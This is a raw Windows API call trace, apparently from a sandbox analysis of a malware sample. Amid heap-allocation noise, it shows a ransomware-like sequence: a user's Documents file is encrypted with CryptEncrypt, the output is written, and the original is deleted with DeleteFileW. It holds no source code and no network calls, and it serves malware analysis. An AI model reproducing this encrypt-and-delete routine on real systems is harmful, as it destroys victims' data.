lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0080.431] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0080.431] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.433] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.433] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.433] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.433] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0080.433] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.434] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.444] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3800, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.444] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x6707, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x6710) returned 1 [0080.444] CharLowerBuffW (in: lpsz="byte[26385]", cchLength=0xb | out: lpsz="byte[26385]") returned 0xb [0080.445] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.445] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ad538*, pdwDataLen=0x144e088*=0x6707, dwBufLen=0x6710 | out: pbData=0x49ad538*, pdwDataLen=0x144e088*=0x6710) returned 1 [0080.445] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.445] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.445] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.446] WriteFile (in: hFile=0x298, lpBuffer=0x49a0720*, nNumberOfBytesToWrite=0x6710, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x49a0720*, lpNumberOfBytesWritten=0x144ea8c*=0x6710, lpOverlapped=0x0) returned 1 [0080.449] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0080.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb360, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0080.449] CryptDestroyKey (hKey=0x41ac040) returned 1 [0080.449] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.449] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.449] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0080.449] CryptReleaseContext (hProv=0x41a4d00, dwFlags=0x0) returned 1 [0080.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.450] FreeLibrary (hLibModule=0x756e0000) returned 1 [0080.450] CloseHandle (hObject=0x258) returned 1 [0080.450] CloseHandle (hObject=0x298) returned 1 [0080.451] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps", lpFilePart=0x0) returned 0x40 [0080.451] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\244ql-yoiaa.pps")) returned 0x20 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0080.452] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9167c0, ftCreationTime.dwHighDateTime=0x1d5ecfc, ftLastAccessTime.dwLowDateTime=0x9150bcd0, ftLastAccessTime.dwHighDateTime=0x1d5e821, ftLastWriteTime.dwLowDateTime=0x9150bcd0, ftLastWriteTime.dwHighDateTime=0x1d5e821, nFileSizeHigh=0x0, nFileSizeLow=0x6707, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="244Ql-yOIaa.pps", cAlternateFileName="244QL-~1.PPS")) returned 0x41ac180 [0080.452] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\244ql-yoiaa.pps")) returned 1 [0080.454] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9167c0, ftCreationTime.dwHighDateTime=0x1d5ecfc, ftLastAccessTime.dwLowDateTime=0x9150bcd0, ftLastAccessTime.dwHighDateTime=0x1d5e821, ftLastWriteTime.dwLowDateTime=0x9150bcd0, ftLastWriteTime.dwHighDateTime=0x1d5e821, nFileSizeHigh=0x0, nFileSizeLow=0x6707, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="244Ql-yOIaa.pps", cAlternateFileName="244QL-~1.PPS")) returned 0 [0080.454] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0080.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0080.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0080.455] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0080.455] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e87e8 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0080.455] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.455] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0080.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0080.455] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0080.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0080.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314a28 [0080.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0080.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.456] 